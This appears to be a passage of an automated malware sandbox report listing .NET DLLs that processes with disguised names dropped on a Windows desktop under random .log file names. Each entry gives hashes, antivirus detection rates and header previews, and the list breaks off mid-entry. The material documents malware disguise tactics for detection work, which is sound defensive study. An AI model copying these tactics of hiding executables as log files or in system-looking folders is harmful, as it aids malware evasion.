                                                                                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                      C:\Users\user\Desktop\XgvwQtEs.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):342528
                                                                                                                      Entropy (8bit):6.170134230759619
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\YTLXwDIz.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38912
                                                                                                                      Entropy (8bit):5.679286635687991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\ZkmfqpvS.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\aHPfiQDx.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):126976
                                                                                                                      Entropy (8bit):6.057993947082715
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\dYYVtYJg.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\gaqNoVOB.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46592
                                                                                                                      Entropy (8bit):5.870612048031897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\hwUMgwXg.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                      C:\Users\user\Desktop\jLWdviZu.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34304
                                                                                                                      Entropy (8bit):5.618776214605176
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\jUtdfVsr.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.660491370279985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                      MD5:240E98D38E0B679F055470167D247022
                                                                                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\jyGvCfcb.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64000
                                                                                                                      Entropy (8bit):5.857602289000348
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\lKQdHBzT.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41472
                                                                                                                      Entropy (8bit):5.6808219961645605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\lNILRSep.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34816
                                                                                                                      Entropy (8bit):5.636032516496583
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\lealJKxT.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):50176
                                                                                                                      Entropy (8bit):5.723168999026349
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\nBMUCfZn.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                      C:\Users\user\Desktop\pAGUOyAM.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46592
                                                                                                                      Entropy (8bit):5.870612048031897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\uAoBkxMT.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):70144
                                                                                                                      Entropy (8bit):5.909536568846014
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\vSFbtVsB.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34304
                                                                                                                      Entropy (8bit):5.618776214605176
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\vlAbNuev.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.629584586954759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
